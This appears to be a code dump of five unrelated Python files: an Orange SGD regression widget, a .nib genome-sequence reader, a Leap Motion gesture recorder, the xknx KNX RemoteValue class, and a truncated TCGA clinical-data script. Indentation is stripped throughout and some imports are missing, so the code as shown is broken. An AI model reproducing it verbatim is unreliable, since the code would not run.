import Orange.data
from Orange.regression import linear
from Orange.preprocess.preprocess import Preprocess
from Orange.widgets import widget, settings, gui
class OWSGDRegression(widget.OWWidget):
name = "Stochastic Gradient Descent"
description = "Stochastic Gradient Descent Regression."
icon = "icons/SGDRegression.svg"
inputs = [{"name": "Data",
"type": Orange.data.Table,
"handler": "set_data"},
{"name": "Preprocessor",
"type": Preprocess,
"handler": "set_preprocessor"}]
outputs = [{"name": "Learner",
"type": linear.SGDRegressionLearner},
{"name": "Predictor",
"type": linear.LinearModel}]
learner_name = settings.Setting("SGD Regression")
alpha = settings.Setting(0.0001)
#: epsilon parameter for Epsilon SVR
epsilon = settings.Setting(0.1)
eta0 = settings.Setting(0.01)
l1_ratio = settings.Setting(0.15)
power_t = settings.Setting(0.25)
n_iter = settings.Setting(5)
#: Loss of function to be used
SqLoss, Huber, Epsilon_i, SqEpsilon_i = 0, 1, 2, 3
L1, L2, ElasticNet = 0, 1, 2
#: Selected loss of function
loss_function = settings.Setting(SqLoss)
penalty_type = settings.Setting(L2)
InvScaling, Constant = 0, 1
learning_rate = settings.Setting(InvScaling)
want_main_area = False
def __init__(self, parent=None):
super().__init__(parent)
self.data = None
self.preprocessors = None
box = gui.widgetBox(self.controlArea, self.tr("Name"))
gui.lineEdit(box, self, "learner_name")
form = QGridLayout()
typebox = gui.radioButtonsInBox(
self.controlArea, self, "lossfunc", [],
orientation=form,
)
# Loss function control
box = gui.widgetBox(self.controlArea, self.tr("Loss function to be used"))
buttonbox = gui.radioButtonsInBox(
box, self, "loss_function",
btnLabels=["Squared loss",
"Huber",
"Epsilon insensitive",
"Squared Epsilon insensitive"],
callback=self._on_func_changed
)
parambox = gui.widgetBox(box, orientation="horizontal")
box = gui.widgetBox(self.controlArea, self.tr("Penalty"))
buttonbox = gui.radioButtonsInBox(
box, self, "penalty_type",
btnLabels=["Absolute norm (L1)",
"Euclidean norm (L2)",
"Elastic Net (both)"],
callback=self._on_penalty_changed
)
parambox = gui.widgetBox(box, orientation="horizontal")
box = gui.widgetBox(self.controlArea, self.tr("Learning rate"))
buttonbox = gui.radioButtonsInBox(
box, self, "learning_rate",
btnLabels=["Inverse scaling",
"Constant"],
callback=self._on_lrate_changed
)
box = gui.widgetBox(self.controlArea, self.tr("Constants"))
form = QtGui.QFormLayout()
form.setContentsMargins(0, 0, 0, 0)
box.layout().addLayout(form)
alpha = gui.doubleSpin(box, self, "alpha", 0.0, 10.0, step=0.0001)
form.addRow("Alpha:", alpha)
spin = gui.doubleSpin(box, self, "eta0", 0.0, 10, step=0.01)
form.addRow("Eta0:", spin)
epsilon = gui.doubleSpin(box, self, "epsilon", 0.0, 10.0, step=0.01)
form.addRow("Epsilon:", epsilon)
l1_ratio = gui.doubleSpin(box, self, "l1_ratio", 0.0, 10.0, step=0.01)
form.addRow("L1 ratio:", l1_ratio)
power_t = gui.doubleSpin(box, self, "power_t", 0.0, 10.0, step=0.01)
form.addRow("Power t:", power_t)
# Number of iterations control
box = gui.widgetBox(self.controlArea, "Number of iterations")
gui.doubleSpin(box, self, "n_iter", 0, 1e+6, step=1)
self._func_params = [epsilon]
self._penalty_params = [l1_ratio]
self._lrate_params = [power_t]
gui.button(self.controlArea, self, "&Apply",
callback=self.apply, default=True)
self.setSizePolicy(
QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed,
QtGui.QSizePolicy.Fixed)
)
self.setMinimumWidth(300)
self._on_func_changed()
self.apply()
def set_data(self, data):
"""Set the input train data set."""
self.warning(0)
if data is not None:
if not isinstance(data.domain.class_var,
Orange.data.ContinuousVariable):
data = None
self.warning(0, "Data does not have a continuous class var")
self.data = data
if data is not None:
self.apply()
def set_preprocessor(self, preproc):
if preproc is None:
self.preprocessors = None
else:
self.preprocessors = (preproc,)
self.apply()
def apply(self):
loss = ["squared_loss", "huber", "epsilon_insensitive", "squared_epsilon_insensitive"][self.loss_function]
penalty = ["l1", "l2", "elasticnet"][self.penalty_type]
learning_rate = ["invscaling", "constant"][self.learning_rate]
common_args = dict(
loss=loss,
alpha=self.alpha,
epsilon=self.epsilon,
eta0=self.eta0,
l1_ratio=self.l1_ratio,
power_t=self.power_t,
penalty=penalty,
learning_rate=learning_rate,
n_iter=self.n_iter,
)
learner = linear.SGDRegressionLearner(
preprocessors=self.preprocessors, **common_args)
learner.name = self.learner_name
predictor = None
if self.data is not None:
predictor = learner(self.data)
predictor.name = self.learner_name
self.send("Learner", learner)
self.send("Predictor", predictor)
def _on_func_changed(self):
enabled = [[False], # squared loss
[True], # huber
[True], # epsilon insensitive
[True]] # squared epsilon insensitive
mask = enabled[self.loss_function]
for spin, enabled in zip(self._func_params, mask):
spin.setEnabled(enabled)
def _on_penalty_changed(self):
enabled = [[False], # l1
[False], # l2
[True]] # elasticnet
mask = enabled[self.penalty_type]
for spin, enabled in zip(self._penalty_params, mask):
spin.setEnabled(enabled)
def _on_lrate_changed(self):
enabled = [[True], # invscaling
[False]] # constant
mask = enabled[self.learning_rate]
for spin, enabled in zip(self._lrate_params, mask):
spin.setEnabled(enabled)
def main():
app = QtGui.QApplication([])
w = OWSGDRegression()
w.set_data(Orange.data.Table("housing"))
w.show()
return app.exec_()
if __name__ == "__main__":
import sys
sys.exit(main())
|
|
'''Functions and classes used to interface with .nib files as created by Jim
Kent's nibFrag and faToNib utilities.'''
import glob
import math
import os
import struct
import sys
import warnings
from cStringIO import StringIO
from collections import defaultdict as dd
from chipsequtil import reverse_complement, get_file_parts, BEDFile
# module fields
NOMASK,MASK,HARDMASK = range(3)
class NibException(Exception) : pass
def _nib_fd(nib) :
'''Returns filename and file descriptor for nib, detecting whether it is a \
path or fd appropriately'''
# check to see if nib is a file or a string
if isinstance(nib,file) :
nib_fn = nib.name
nib.seek(0)
nib_f = nib
elif isinstance(nib,str) :
nib_fn = nib
nib_f = open(nib,'rb')
else :
raise NibException('Incompatible .nib argument %s with type %s, needs to \
be either <type \'file\'> or <type \'str\'>'%(str(nib),type(nib)))
return nib_fn, nib_f
def get_nib(nib,start=0,end=-1,strand='+',mask=NOMASK,name=None,dbHeader=None,tbaHeader=None) :
'''Return a (header,sequence) tuple representing this nibFrag record'''
headers = get_nib_header_batch(nib,[(start,end,strand,name,dbHeader,tbaHeader),])
seqs = get_nib_seq_batch(nib,[(start,end,strand)],mask)
return headers[0], seqs[0]
def get_nib_batch(nib,queries,mask=NOMASK) :
'''Batch interface for fetching fasta records. Returns tuple of lists
(headers,sequences)'''
headers = get_nib_header_batch(nib,queries)
seqs = get_nib_seq_batch(nib,[x[:3] for x in queries],mask=mask)
return headers, seqs
def get_nib_seq(nib,start=0,end=-1,strand='+',mask=NOMASK) :
'''Extract subsequence from .nib file like Jim Kent's nibFrag utility.
Default behavior is to return the entire sequence.
Extract the nucleotide substring defined by the closed interval [start,end]
from the sequence found in *nib_fn*. *mask* parameter has the following
possible values:
chipsequtil.nib.NOMASK -- masked positions are not indicated (default)
chipsequtil.nib.MASK -- masked positions are capitalized, normal bases lower case
chipsequtil.nib.NOMASK -- masked positions are replaced with Ns
'''
return get_nib_seq_batch(nib,[(start,end,strand)],mask)[0]
def get_nib_header(nib_fn,start=0,end=-1,strand='+',name=None,dbHeader=None,tbaHeader=None) :
'''Method for constructing fasta headers compliant with nibFrag utility'''
headers = get_nib_header_batch(nib,[(start,end,strand,name,dbHeader,tbaHeader),])
return headers[0]
def get_nib_header_batch(nib,queries) :
'''Batch method for creating nibFrag headers. *queries* is a list of at most
6-tuples (start,end,strand,name,dbHeader,tbaHeader) representing queries as
specified by the original nibFrag utility. Only start, end, and strand
fields are required.'''
nib_path, nib_f = _nib_fd(nib)
nib_dir,nib_fn,nib_base,nib_ext = get_file_parts(nib_path)
nbases = validate_nib_file(nib)
headers = []
header_tmpl = '>%(name)s%(db)s\n'
for rec in queries :
# set some defaults if they are not supplied
rec = list(rec)
rec.extend([None]*(6-len(rec)))
start, end, strand, name, dbHeader, tbaHeader = rec
if end == -1 :
end = nbases
fields = {}
fields['name'] = nib_path+':%d-%d'%(start,end) if not name else name
fields['db'] = ''
if tbaHeader :
# ignored for some reason in nibFrag when tbaHeader supplied and dbHeader is not
fields['name'] = '' if not dbHeader else fields['name']
fields['db'] = '%s.%s:%d-%d of %d'%(tbaHeader,nib_base,start,end,nbases)
if dbHeader :
fields['db'] = ':%s.%s:%d-%d:%s:%d'%(dbHeader,nib_base,start,end,strand,nbases)
headers.append(header_tmpl%fields)
return headers
def validate_nib_file(nib) :
'''Validate .nib file header, returning number of bases indicated if successful.
*nib* argument is either a filename or an open file object.
'''
nib_fn, nib_f = _nib_fd(nib)
# first 4 bytes are a nib file signature
#TODO - consider attempting to figure out byte order to make truly cross platform
def_sig = 0x6BE93D3A
sig = struct.unpack('=l',nib_f.read(4))[0]
if def_sig != sig :
raise NibException('Invalid nib file signature in %s, found %s, expected \
%s, perhaps .nib file as not created on this platform?\n\nnibFrag style \
error: %s is not not a good .nib file.'%(nib_fn,hex(sig),hex(def_sig),nib_fn))
# second 4 bytes are number of bases in sequence
nbases = struct.unpack('=l',nib_f.read(4))[0]
return nbases
def get_nib_seq_batch(nib,queries,mask=NOMASK) :
'''Extract subsequence from .nib file like Jim Kent's nibFrag utility.
Extract the nucleotide substrings defined by the closed intervals in *queries*
from the sequence found in *nib*. *nib* argument is either a filename or
an open file object. Entries in *queries* are 3-tuples defining (start,end,strand)
sequence coordinates. Sequences are returned in order in a list as
strings. *mask* parameter has the following possible values:
chipsequtil.nib.NOMASK -- masked positions are not indicated (default)
chipsequtil.nib.MASK -- masked positions are capitalized, normal bases lower case
chipsequtil.nib.NOMASK -- masked positions are replaced with Ns
'''
nib_fn, nib_f = _nib_fd(nib)
nbases = validate_nib_file(nib_f)
# rest of file is sequence, with each nibble (4 bytes) being a base as \
# follows (from http://genome.ucsc.edu/FAQ/FAQformat.html#format8) :
#
# 0 - T
# 1 - C
# 2 - A
# 3 - G
# 4 - N
#
# The most significant bit in a nibble is set if the base is masked
trans_nuc = 'tcagn'
# start translating the nibbles into nucleotides
def trans_nib(nib) :
nuc = trans_nuc[nib&7]
mask_bit = nib & 8
if mask in [MASK,HARDMASK] and mask_bit == 0 :
return nuc.upper()
if mask == HARDMASK and mask_bit == 1 :
return 'N'
return nuc
headers = [] # stores headers
seqs = [] # stores sequences
# sort the coords so we can walk most efficiently through the file
queries.sort()
for start, end, strand in queries :
if start < 0 :
raise NibException('Received negative start coordinate, this may '\
'indicate a region on mitochondrial DNA that '\
'spans reference sequence start and end. This '\
'utility cannot handle these cases, aborting. '\
'Requested interval: %s (%d,%d)'%(nib_fn,start,end))
start, end = map(int,(start,end))
# end == -1 means caller wants entire sequence
if end == -1 :
end = nbases
if any([nbases < c for c in [start,end]]) :
raise NibException(('Requested slice (%(start)d,%(end)d) not compatible ' \
'with sequence of length %(nbases)d in %(nib_fn)s, aborting\n\nnibFrag '\
'style error: nib read past end of file (%(start)d %(end)d) in file: '\
'%(nib_fn)s')%{'start':start,'end':end,'nbases':nbases,'nib_fn':nib_fn})
# figure out how many bytes to read through
start_byte,rem_byte = start/2,start%2
# calculate where we need to move to in the file from the current location
# + 8 is from the 2*4 bytes header info in the .nib format
byte_offset = start_byte-nib_f.tell() + 8
nib_f.seek(byte_offset,1) # seek forward to the beginning byte from current location
seq_bytes,seq_rem_byte = int(math.ceil((end-start+rem_byte)/2.)),(end+1)%2
seq_bytes = nib_f.read(seq_bytes+seq_rem_byte)
# start translating the bytes
seq = StringIO() # we use StringIO because it is more efficient than concatenating strings
for c in seq_bytes :
c_byte = struct.unpack('=b',c)[0]
# higher nibble
c_nib = (c_byte & (15<<4))>>4
nuc = trans_nib(c_nib)
seq.write(nuc)
# lower nibble
c_nib = int(c_byte) & 15
nuc = trans_nib(c_nib)
seq.write(nuc)
# final nucleotide sequence
seq_str = seq.getvalue()
# if we're reading to the end, don't clip anything
if end != nbases :
# if the coordinate requested was not on a byte boundary, adjust
if rem_byte == 1 :
seq_str = seq_str[1:]
if seq_rem_byte == 1 :
seq_str = seq_str[:-1]
# nibFrag apparently uses zero-based indexing, clip off one base
seq_str = seq_str[:-1]
seq.close()
# adjust strand
if strand == '-' :
seq_str = reverse_complement(seq_str)
seqs.append(seq_str)
return seqs
class SeqDBException(Exception): pass
class NibDBException(Exception): pass
class SeqDB(object) :
'''Base class for different kinds of sequence databases. Does nothing,
implement subclasses. Constructor rovides _db_map and db_info class members.'''
def __init__(self) :
self._db_map = {}
self.db_info = dd(dict)
def get_seq(self,*args, **kwargs) :
raise SeqDBException('Base class SeqDB has no get_seq implementation')
class NibDB(SeqDB) :
'''Class providing an interface to a set of .nib files as created by faToNib
in Jim Kent's software suite.
Sequences are identified by the basename of the .nib file without the .nib
extension, e.g. chr1.nib is identified as chr1.
Some potentially useful information about the entries in the database is
stored in the *nib_info* dictionary.
'''
def __init__(self,nib_fns=[],nib_dirs=[]) :
'''*nib_fns* is a list of paths to specific .nib files desired for the
NibDB. *nib_dirs* is a list of paths to directories containing .nib
files such that every .nib file in the directories is added to the NibDB.
Explicitly passed files take precedence over those found in directories
when sequence names collide.
'''
SeqDB.__init__(self)
# find all *.nib files in the directories passed
if isinstance(nib_dirs,str) : # user just provided single directory
nib_dirs = [nib_dirs]
dir_nibs = []
for d in nib_dirs :
dir_nibs.extend(glob.glob(os.path.join(d,'*.nib')))
if isinstance(nib_fns,str) :
nib_fns = [nib_fns]
# for each .nib found, add to db
# if there is a collision of names, those specified in files (not dirs)
# takes precedence without warning
for fn in dir_nibs+nib_fns :
# open the nib file
nib_path,nib_fn,nib_base,nib_ext = get_file_parts(fn)
fn, nib_f = _nib_fd(fn)
self._db_map[nib_base] = nib_f
# store some info
self.db_info[nib_base]['path'] = fn
nbases = validate_nib_file(self._db_map[nib_base])
self.db_info[nib_base]['nbases'] = nbases
def __del__(self) :
'''import this
...Explicit is better than implicit...
'''
for nib_f in self._db_map.values() :
nib_f.close()
def _get_db_map(self,name) :
'''Gets appropriate file handle for the requested name, raises NibDBException
if it cannot be found'''
try :
return self._db_map[name]
except KeyError :
raise NibDBException('Sequence name %s not found in NibDB'%name)
def get_fasta(self,name,start=0,end=-1,strand='+',mask=NOMASK) :
'''Get the fasta record for the specified arguments, returns (header,sequence)
tuple.'''
nib_f = self._get_db_map(name)
return get_nib(nib_f,start,end,strand,mask)
def get_fasta_batch(self,recs,mask=NOMASK) :
'''Batch version of *get_fasta* method. *recs* is a list of lists/tuples
with (<chromo>,<start>,<end>,<strand>). Returns list of (header,sequence)
tuples in the same sequence as the input records.'''
# gather the records for each chromosome together
chrom_recs = dd(list)
for i,r in enumerate(recs) :
chrom_recs[r[0]].append((i,r)) # recs are (index,<tuple>)
# extract sequences
all_chrom_recs = []
for chrom, rec_list in chrom_recs.items() :
# sorted lists make sequence extraction efficient
rec_list.sort(key=lambda x: x[1][1]) # recs are (index,<tuple>)
# separate indexes from records, extract for this chromo
indexes, c_recs = zip(*rec_list)
# get_nib_batch requires list of (<start>,<end>,<strand>) tuples, remove
# chromo in first position
c_recs = [r[1:] for r in c_recs]
nib_f = self._get_db_map(chrom)
headers, seqs = get_nib_batch(nib_f,c_recs,mask)
# return the sequences to a (index,(header,sequence)) list
all_chrom_recs.extend(zip(indexes,zip(headers,seqs)))
# put the sequences back in the original order
all_chrom_recs.sort(key=lambda x: x[0]) # recs are (index,<tuple>) again
indexes, recs = zip(*all_chrom_recs)
return zip(*recs)
def get_fasta_from_bed(self,bed,mask=NOMASK) :
'''Accepts either a chipsequtil.BEDFile instance or a filename for a BED
file (used to construct a BEDFile instance) and returns the fasta
records for all records in order.'''
# determine if *bed* is a filename or a BEDFile
if isinstance(bed,str) : # filename
bed = BEDFile(bed)
# construct the records
recs = []
for rec in bed :
if rec['chrom'].lower().startswith('track') : # track line, skip
continue
recs.append((rec['chrom'],int(rec['chromStart']),int(rec['chromEnd']),rec['strand']))
return self.get_fasta_batch(recs,mask)
def get_seq(self,name,start=0,end=-1,strand='+',mask=NOMASK) :
'''Extract sequence from sequence *name*. Other arguments are passed
directly to *get_nib_seq* function.'''
nib_f = self._get_db_map(name)
return get_nib_seq(nib_f,start,end,strand,mask)
|
|
################################################################################
# Copyright (C) 2012-2013 Leap Motion, Inc. All rights reserved. #
# Leap Motion proprietary and confidential. Not for distribution. #
# Use subject to the terms of the Leap Motion SDK Agreement available at #
# https://developer.leapmotion.com/sdk_agreement, or another agreement #
# between Leap Motion and you, your company or other organization. #
################################################################################
from __future__ import division
import Leap, sys, thread, time
from Leap import CircleGesture, KeyTapGesture, ScreenTapGesture, SwipeGesture
import math
gesture = sys.argv[1]
outfile = open('data'+gesture+'.csv','wb')
finger_names = ['Thumb', 'Index', 'Middle', 'Ring', 'Pinky']
def calc_dist(p1,p2):
return math.sqrt((p2.x - p1.x) ** 2 +
(p2.y - p1.y) ** 2 +
(p2.z - p1.z) ** 2)
def getSpeed(p1):
return math.sqrt(p1.x**2 + p1.y**2 + p1.z**2)
class HandInformation(object):
def __init__(self,hand):
self.record_time = time.time()
# measure distances
self.palm_position = hand.palm_position
# print "Palm position:",self.palm_position/10
self.finger_positions = {}
# Get fingers
for finger in hand.fingers:
# create a dictionary for that finger type
self.finger_positions[finger.type] = {}
# get bones and save only the end of each bone
for b in range(0,4):
bone = finger.bone(b)
#now get the x and y directions
self.finger_positions[finger.type][b] = bone.next_joint
# print self.finger_positions
self.palm_to_fingers = {}
#now create all the matchings
for key in self.finger_positions:
for i in range(4):
self.palm_to_fingers[(key,i)] = calc_dist(self.palm_position,self.finger_positions[key][i])
if i==3:
print "Finger: ",key," bone ",i," end: ",self.finger_positions[key][i]," to palm:",self.palm_to_fingers[(key,i)]
self.finger_to_finger = {}
for i in range(5):
for j in [x for x in range(5) if x!=i]:
if ((j,i) in self.finger_to_finger.keys()):
continue
else:
self.finger_to_finger[(i,j)] = calc_dist(self.finger_positions[i][3],self.finger_positions[j][3])
print "Finger:",i," to finger:",j," distance is ",self.finger_to_finger[(i,j)]
self.palm_velocity = getSpeed(hand.palm_velocity)
print "Palm velocity: ",self.palm_velocity, " and direction is ",hand.direction
def __str__(self):
ret = str(self.palm_position)
ret += "," + str(self.palm_velocity) + ","
return ret
def getArray(self):
returnArray = []
returnArray.append(self.record_time)
returnArray.append(self.palm_velocity)
for i in range(5):
returnArray.append(self.palm_to_fingers[(i,3)])
for i in range(5):
for j in [x for x in range(5) if x!=i]:
if ((j,i) in self.finger_to_finger.keys()):
continue
else:
returnArray.append(self.finger_to_finger[(i,j)])
return returnArray
class FPS(object):
def __init__(self):
self.frames = []
self.frames.append(time.time())
self.startTime = time.time()
def new(self):
if self.frames == []:
self.frames = time.time()
else:
self.frames.append(time.time())
now = time.time()
self.frames = [x for x in self.frames if x > (now-1)]
print "FPS: ",len(self.frames)
class SampleListener(Leap.Listener):
finger_names = ['Thumb', 'Index', 'Middle', 'Ring', 'Pinky']
bone_names = ['Metacarpal', 'Proximal', 'Intermediate', 'Distal']
state_names = ['STATE_INVALID', 'STATE_START', 'STATE_UPDATE', 'STATE_END']
def on_init(self, controller):
print "Initialized"
self.FPS1 = FPS()
def on_connect(self, controller):
print "Connected"
# Enable gestures
controller.enable_gesture(Leap.Gesture.TYPE_CIRCLE);
controller.enable_gesture(Leap.Gesture.TYPE_KEY_TAP);
controller.enable_gesture(Leap.Gesture.TYPE_SCREEN_TAP);
controller.enable_gesture(Leap.Gesture.TYPE_SWIPE);
def on_disconnect(self, controller):
# Note: not dispatched when running in a debugger.
print "Disconnected"
def on_exit(self, controller):
print "Exited"
def on_frame(self, controller):
self.FPS1.new()
time.sleep(0.02)
# Get the most recent frame and report some basic information
frame = controller.frame()
print "Frame id: %d, timestamp: %d, hands: %d, fingers: %d, tools: %d, gestures: %d" % (
frame.id, frame.timestamp, len(frame.hands), len(frame.fingers), len(frame.tools), len(frame.gestures()))
# Get hands
for hand in frame.hands:
if not hand.is_left:
h = HandInformation(hand)
resultStr = [int(x) for x in h.getArray()]
outfile.write(str(resultStr)[1:-1]+'\n')
def state_string(self, state):
if state == Leap.Gesture.STATE_START:
return "STATE_START"
if state == Leap.Gesture.STATE_UPDATE:
return "STATE_UPDATE"
if state == Leap.Gesture.STATE_STOP:
return "STATE_STOP"
if state == Leap.Gesture.STATE_INVALID:
return "STATE_INVALID"
def main():
# Create a sample listener and controller
print "READY?"
time.sleep(1)
print "3"
time.sleep(1)
print "2"
time.sleep(1)
print "1"
time.sleep(1)
listener = SampleListener()
controller = Leap.Controller()
# Have the sample listener receive events from the controller
controller.add_listener(listener)
# Keep this process running until Enter is pressed
print "Press Enter to quit..."
try:
sys.stdin.readline()
except KeyboardInterrupt:
pass
finally:
# Remove the sample listener when done
controller.remove_listener(listener)
if __name__ == "__main__":
main()
|
|
"""
Module for managing a remote value on the KNX bus.
Remote value can be :
- a group address for writing a KNX value,
- a group address for reading a KNX value,
- or a group of both representing the same value.
"""
from __future__ import annotations
from abc import ABC, abstractmethod
import logging
from typing import TYPE_CHECKING, Awaitable, Callable, Generic, Iterator, TypeVar, Union
from xknx.dpt.dpt import DPTArray, DPTBinary
from xknx.exceptions import ConversionError, CouldNotParseTelegram
from xknx.telegram import GroupAddress, Telegram
from xknx.telegram.address import (
DeviceGroupAddress,
InternalGroupAddress,
parse_device_group_address,
)
from xknx.telegram.apci import GroupValueResponse, GroupValueWrite
if TYPE_CHECKING:
from xknx.telegram.address import DeviceAddressableType
from xknx.xknx import XKNX
logger = logging.getLogger("xknx.log")
AsyncCallbackType = Callable[[], Awaitable[None]]
DPTPayloadType = TypeVar(
"DPTPayloadType", DPTArray, DPTBinary, Union[DPTArray, DPTBinary]
)
GroupAddressesType = Union["DeviceAddressableType", list["DeviceAddressableType"]]
ValueType = TypeVar("ValueType")
class RemoteValue(ABC, Generic[DPTPayloadType, ValueType]):
"""Class for managing remote knx value."""
def __init__(
self,
xknx: XKNX,
group_address: GroupAddressesType | None = None,
group_address_state: GroupAddressesType | None = None,
sync_state: bool | int | float | str = True,
device_name: str | None = None,
feature_name: str | None = None,
after_update_cb: AsyncCallbackType | None = None,
):
"""Initialize RemoteValue class."""
self.xknx: XKNX = xknx
self.passive_group_addresses: list[DeviceGroupAddress] = []
def unpack_group_addresses(
addresses: GroupAddressesType | None,
) -> DeviceGroupAddress | None:
"""Parse group addresses and assign passive addresses when given."""
if addresses is None:
return None
if not isinstance(addresses, list):
return parse_device_group_address(addresses)
active, *passive = map(parse_device_group_address, addresses)
self.passive_group_addresses.extend(passive) # type: ignore
return active
self.group_address = unpack_group_addresses(group_address)
self.group_address_state = unpack_group_addresses(group_address_state)
self.device_name: str = "Unknown" if device_name is None else device_name
self.feature_name: str = "Unknown" if feature_name is None else feature_name
self._value: ValueType | None = None
self.telegram: Telegram | None = None
self.after_update_cb: AsyncCallbackType | None = after_update_cb
if sync_state and self.group_address_state:
self.xknx.state_updater.register_remote_value(
self, tracker_options=sync_state
)
def __del__(self) -> None:
"""Destructor. Removing self from StateUpdater if was registered."""
try:
self.xknx.state_updater.unregister_remote_value(self)
except (KeyError, AttributeError):
# KeyError if it was never added to StateUpdater
# AttributeError if instantiation failed (tests mostly)
pass
@property
def value(self) -> ValueType | None:
"""Get current value."""
return self._value
@value.setter
def value(self, value: ValueType | None) -> None:
"""Set new value without creating a Telegram or calling after_update_cb. Raises ConversionError on invalid value."""
if value is not None:
# raises ConversionError on invalid value
self.to_knx(value)
self._value = value
async def update_value(self, value: ValueType | None) -> None:
"""Set new value without creating a Telegram. Awaits after_update_cb. Raises ConversionError on invalid value."""
self.value = value
if self.after_update_cb is not None:
await self.after_update_cb()
@property
def initialized(self) -> bool:
"""Evaluate if remote value is initialized with group address."""
return bool(
self.group_address_state
or self.group_address
or self.passive_group_addresses
)
@property
def readable(self) -> bool:
"""Evaluate if remote value should be read from bus."""
return bool(self.group_address_state)
@property
def writable(self) -> bool:
"""Evaluate if remote value has a group_address set."""
return bool(self.group_address)
def has_group_address(self, group_address: DeviceGroupAddress) -> bool:
"""Test if device has given group address."""
def remote_value_addresses() -> Iterator[DeviceGroupAddress | None]:
"""Yield all group_addresses."""
yield self.group_address
yield self.group_address_state
yield from self.passive_group_addresses
return group_address in remote_value_addresses()
@abstractmethod
def payload_valid(self, payload: DPTArray | DPTBinary | None) -> DPTPayloadType:
"""Return payload if telegram payload may be parsed - to be implemented in derived class."""
raise CouldNotParseTelegram("Payload invalid", payload=str(payload))
@abstractmethod
def from_knx(self, payload: DPTPayloadType) -> ValueType:
"""Convert current payload to value - to be implemented in derived class."""
@abstractmethod
def to_knx(self, value: ValueType) -> DPTPayloadType:
"""Convert value to payload - to be implemented in derived class."""
async def process(self, telegram: Telegram, always_callback: bool = False) -> bool:
"""Process incoming or outgoing telegram."""
if not isinstance(
telegram.destination_address, (GroupAddress, InternalGroupAddress)
) or not self.has_group_address(telegram.destination_address):
return False
if not isinstance(
telegram.payload,
(
GroupValueWrite,
GroupValueResponse,
),
):
raise CouldNotParseTelegram(
"payload not a GroupValueWrite or GroupValueResponse",
payload=str(telegram.payload),
destination_address=str(telegram.destination_address),
source_address=str(telegram.source_address),
device_name=self.device_name,
feature_name=self.feature_name,
)
try:
_new_payload = self.payload_valid(telegram.payload.value)
decoded_payload = self.from_knx(_new_payload)
except (ConversionError, CouldNotParseTelegram) as err:
logger.warning(
"Can not process %s for %s - %s: %s",
telegram,
self.device_name,
self.feature_name,
err,
)
return False
self.xknx.state_updater.update_received(self)
if self._value is None or always_callback or self._value != decoded_payload:
self._value = decoded_payload
self.telegram = telegram
if self.after_update_cb is not None:
await self.after_update_cb()
return True
async def _send(
self, payload: DPTArray | DPTBinary, response: bool = False
) -> None:
"""Send payload as telegram to KNX bus."""
if self.group_address is not None:
telegram = Telegram(
destination_address=self.group_address,
payload=(
GroupValueResponse(payload)
if response
else GroupValueWrite(payload)
),
source_address=self.xknx.current_address,
)
await self.xknx.telegrams.put(telegram)
async def set(self, value: ValueType, response: bool = False) -> None:
"""Set new value."""
if not self.initialized:
logger.info(
"Setting value of uninitialized device: %s - %s (value: %s)",
self.device_name,
self.feature_name,
value,
)
return
if not self.writable:
logger.warning(
"Attempted to set value for non-writable device: %s - %s (value: %s)",
self.device_name,
self.feature_name,
value,
)
return
payload = self.to_knx(value)
await self._send(payload, response)
# self._value is set and after_update_cb() called when the outgoing telegram is processed.
async def respond(self) -> None:
"""Send current payload as GroupValueResponse telegram to KNX bus."""
if self._value is not None:
payload = self.to_knx(self._value)
await self._send(payload, response=True)
async def read_state(self, wait_for_result: bool = False) -> None:
"""Send GroupValueRead telegram for state address to KNX bus."""
if self.group_address_state is not None:
# pylint: disable=import-outside-toplevel
# TODO: send a ReadRequest and start a timeout from here instead of ValueReader
# cancel timeout form process(); delete ValueReader
from xknx.core import ValueReader
value_reader = ValueReader(self.xknx, self.group_address_state)
if wait_for_result:
telegram = await value_reader.read()
if telegram is not None:
await self.process(telegram)
else:
logger.warning(
"Could not sync group address '%s' (%s - %s)",
self.group_address_state,
self.device_name,
self.feature_name,
)
else:
await value_reader.send_group_read()
@property
def unit_of_measurement(self) -> str | None:
"""Return the unit of measurement."""
return None
def group_addr_str(self) -> str:
"""Return object as readable string."""
return (
f"<{self.group_address}, "
f"{self.group_address_state}, "
f"{list(map(str, self.passive_group_addresses))}, "
f"{self.value.__repr__()} />"
)
def __str__(self) -> str:
"""Return object as string representation."""
return (
f"<{self.__class__.__name__} "
f'device_name="{self.device_name}" '
f'feature_name="{self.feature_name}" '
f"{self.group_addr_str()} />"
)
def __eq__(self, other: object) -> bool:
"""Equal operator."""
for key, value in self.__dict__.items():
if key == "after_update_cb":
continue
if key not in other.__dict__:
return False
if other.__dict__[key] != value:
return False
for key, value in other.__dict__.items():
if key == "after_update_cb":
continue
if key not in self.__dict__:
return False
return True
|
|
## A script for extracting info about the patients used in the analysis
## Load necessary modules
from rpy2 import robjects as ro
import numpy as np
import os
ro.r('library(survival)')
import re
##This call will only work if you are running python from the command line.
##If you are not running from the command line manually type in your paths.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
## There were three clinical files with nonredundant data. V4.0 is in general the most uptodate, but it is possible
## for data in the other files to be more uptodate. As a result, clinical data will be merged.
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','clinical','nationwidechildrens.org_clinical_follow_up_v4.0_brca.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
## A patient can be listed multiple times in the file. The most recent listing (furthest down in the file), contains the most recent
## follow up data. This code checks if the patient has already been loaded into the list, and if so, takes the more recent data.
## This required an empty value in the list initialization.
## Data is: [[Patient ID, time(days), Vital status],[Patient ID, time(days), Vital status],...]
clinical1=[['','','']]
for i in data:
if clinical1[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[alive_column]):
clinical1[-1]=[i[patient_column],int(i[alive_column]),'Alive']
elif re.search('^[0-9]+$',i[death_column]):
clinical1[-1]=[i[patient_column],int(i[death_column]),'Dead']
else:
pass
else:
if re.search('^[0-9]+$',i[alive_column]):
clinical1.append([i[patient_column],int(i[alive_column]),'Alive'])
elif re.search('^[0-9]+$',i[death_column]):
clinical1.append([i[patient_column],int(i[death_column]),'Dead'])
else:
pass
## Removing the empty value.
clinical1=clinical1[1:]
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','clinical','nationwidechildrens.org_clinical_follow_up_v2.1_brca.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
